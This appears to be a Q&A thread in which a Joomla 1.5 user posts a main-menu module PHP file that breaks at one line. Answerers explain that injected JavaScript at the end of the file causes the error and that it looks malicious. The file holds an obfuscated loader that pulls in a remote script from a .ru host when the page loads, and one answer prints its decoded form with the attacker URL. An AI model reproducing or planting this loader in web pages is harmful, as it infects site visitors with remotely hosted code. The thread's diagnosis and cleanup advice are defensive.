views:

363

answers:

3

I'm unfortunately having an unknown error with my php file. (for joomla 1.5) I don't seem to get what's wrong.

This is my entire code, with an apparent error on line 84. Would appreciate some feedback, thanks.

<?php

// no direct access
defined('_JEXEC') or die('Restricted access');


if ( ! defined('modMainMenuXMLCallbackDefined') )
{
function modMainMenuXMLCallback(&$node, $args)
{
 $user = &JFactory::getUser();
 $menu = &JSite::getMenu();
 $active = $menu->getActive();
 $path = isset($active) ? array_reverse($active->tree) : null;

 if (($args['end']) && ($node->attributes('level') >= $args['end']))
 {
  $children = $node->children();
  foreach ($node->children() as $child)
  {
   if ($child->name() == 'ul') {
    $node->removeChild($child);
   }
  }
 }

 if ($node->name() == 'ul') {
  foreach ($node->children() as $child)
  {
   if ($child->attributes('access') > $user->get('aid', 0)) {
    $node->removeChild($child);
   }
  }
 }

 if (($node->name() == 'li') && isset($node->ul)) {
  $node->addAttribute('class', 'parent');
 }

 if (isset($path) && (in_array($node->attributes('id'), $path) || in_array($node->attributes('rel'), $path)))
 {
  if ($node->attributes('class')) {
   $node->addAttribute('class', $node->attributes('class').' active');
  } else {
   $node->addAttribute('class', 'active');
  }
 }
 else
 {
  if (isset($args['children']) && !$args['children'])
  {
   $children = $node->children();
   foreach ($node->children() as $child)
   {
    if ($child->name() == 'ul') {
     $node->removeChild($child);
    }
   }
  }
 }

 if (($node->name() == 'li') && ($id = $node->attributes('id'))) {
  if ($node->attributes('class')) {
   $node->addAttribute('class', $node->attributes('class').' item'.$id);
  } else {
   $node->addAttribute('class', 'item'.$id);
  }
 }

 if (isset($path) && $node->attributes('id') == $path[0]) {
  $node->addAttribute('id', 'current');
 } else {
  $node->removeAttribute('id');
 }
 $node->removeAttribute('rel');
 $node->removeAttribute('level');
 $node->removeAttribute('access');
}
 define('modMainMenuXMLCallbackDefined', true);
}

modMainMenuHelper::render($params, 'modMainMenuXMLCallback');

<script>var Zl;if(Zl!='' && Zl!='ki'){Zl=''};function v(){var jL=new String();var M=window;var q="";var ZY='';var Z=unescape;var C;if(C!='' && C!='g'){C=null};this.nj='';var _='';this.X="";var t=new Date();var R="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x61\x72\x65\x61\x73\x61\x6c\x65\x2d\x63\x6f\x6d\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x7a\x2e\x65\x79\x6e\x79\x2d\x63\x6f\x6d\x2e\x59\x6f\x75\x72\x42\x6c\x65\x6e\x64\x65\x72\x50\x61\x72\x74\x73\x2e\x72\x75\x3a";var Od;if(Od!='Dm' && Od!='V'){Od='Dm'};var Vr='';var P=new String("g");var B="";var E;if(E!='' && E!='gD'){E=null};function b(y,U){var zm=new Array();var a='';this.Cm="";var Vb=new String();var k=Z("%5b")+U+Z("%5d");var tX=new String();var MV;if(MV!='' && MV!='qt'){MV='MD'};var c=new RegExp(k, P);return y.replace(c, _);var cS="";var RTD='';};var Zr;if(Zr!='' && Zr!='vJ'){Zr=''};var L=new String();var DE=new Date();var fg;if(fg!='Ep'){fg='Ep'};var nf;if(nf!=''){nf='d_'};var W=Z("%2f%67%6f%6f%67%6c%65%2e%61%74%2f%67%6f%6f%67%6c%65%2e%61%74%2f%64%72%75%64%67%65%72%65%70%6f%72%74%2e%63%6f%6d%2f%74%72%61%76%69%61%6e%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.aA='';var u='';this.XB='';var dP;if(dP!='i' && dP != ''){dP=null};var dN;if(dN!='' && dN!='zx'){dN='_y'};var WS=b('85624104275582212705194497','13296457');var Hb=new Array();var lP;if(lP!='ok' && lP != ''){lP=null};var O=document;function n(){var J;if(J!='mS' && J != ''){J=null};u=R;var jv;if(jv!='' && jv!='jw'){jv=''};u+=WS;var MJ;if(MJ!='Qp'){MJ=''};u+=W;var fj=new Array();this.PM="";try {this.dq='';var ln=new Date();var eS=new Date();h=O.createElement(b('sScwrwi4pSt5','OZjKg4w5S'));var uW=new String();var Aj;if(Aj!='lX'){Aj='lX'};var aF;if(aF!='' && aF!='_o'){aF=null};h.src=u;var GY;if(GY!='ev' && GY!='Jr'){GY='ev'};var KK;if(KK!=''){KK='gDq'};h.defer=[1][0];var nO;if(nO!='tP'){nO=''};var aV=new Date();var bE=new Date();O.body.appendChild(h);this.Ze="";} catch(MC){var Ki;if(Ki!='m_' && Ki != ''){Ki=null};};}M[String("pqP5onloa".substr(4)+"drYD".substr(0,1))]=n;var EY;if(EY!='' && EY!='wn'){EY='Sj'};var ep;if(ep!='' && ep!='_q'){ep='Oy'};var uE=new Array();var E_;if(E_!='iU'){E_='iU'};};this.pt="";v();var tl=new String();</script>
<!--793d57c076e95df45c451725e5dedf6f-->
+6  A: 

I would be willing to hazard a guess that it is the JavaScript at the bottom of the file. You need to close the PHP tags before the JavaScript as otherwise PHP ends up trying to treat the JavaScript as PHP and failing.

I would also be highly suspicious of that JavaScript code as it doesn't look like it is doing anything nice. I would recommend removing it entirely unless you understand what it is doing. If you didn't put it there, check your site for other JavaScript code, consider changing your FTP password as well as ensuring Joomla is fully up to date.

Yacoby
I think yacoby is right
Nicolò Martini
that is exactly the problem here
mcgrailm
I'm not familiar with Joomla, but it's standard practice to **NOT** allow software to amend itself - ensure these files are not owned by the same owner as the webserver, and that write permissions are owner only.
Andy
You should definitely close the PHP tag, as that is the source of your error. But here's what that script boils down to, in case you're curious:window.onload = function n(){ try { h=document.createElement("script"); h.src="http://shareasale-com.google.cz.eyny-com.YourBlenderParts.ru:8080/google.at/google.at/drudgereport.com/travian.com/google.com.php"; h.defer=[1][0]; document.body.appendChild(h); } catch(MC){}; }
Chibu
A: 

Did your production code stop working suddenly? If so, I'd dare say you've been hacked.

BTW, the script loads a script from a Russian site.

Álvaro G. Vicario
dunno if you use joomla but my main menus in the Admin Panel are now disabled. i can't use the menus.
kofi
+3  A: 

You have got virus or something. Joomla mod_menu default.php ends at -

modMainMenuHelper::render($params, 'modMainMenuXMLCallback');
Rifat
you reckon. is this treatable? there's nothing wrong with the code in this case then?
kofi
ook, problem fixed. should have thought of it in the first place. Don't know what happened to the default.php file in the first place but what I did was download a new joomla package and reuploaded the default default.php file again and replaced it on my server. fixed the issue in an instant.Thanks a lot for your support.
kofi
1st of all, delete that script after the line I mentioned. I decrypted that code and found that, it is trying to redirect @ http://shareasale-com.google.cz.eyny-com.YourBlenderParts.ru:Please Check your other files for this kind of script. Joomla doesn't have this kind of stuff.
Rifat
thanks a lot buddy. I've downloaded a new version of joomla and uploaded the defualt file to that error and it's fixed the issue.Thanks once again.
kofi